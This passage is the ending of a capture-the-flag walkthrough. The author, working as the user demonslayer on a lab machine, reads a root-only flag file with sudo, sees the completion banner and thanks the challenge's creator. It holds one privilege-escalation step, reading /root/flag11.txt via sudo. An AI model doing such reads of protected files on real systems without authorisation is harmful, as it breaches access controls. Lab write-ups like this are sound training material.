which makes sense, as that ran as demonslayer rather than root. Going on the above, if we run the same command through sudo it should hopefully work.

$ sudo cat /root/flag11.txt

Suddenly you feel dizzy and fall to the ground!
As you open your eyes you find yourself staring at a computer screen.
Congratulations!!! You have conquered……

 by @xerubus



Wow, that was an incredible CTF. I haven't had so much fun whilst at the same time wanting to smash my laptop to pieces in sheer frustration ever before. Huge congrats and thanks to Xerubus.

I cant wait for the next one.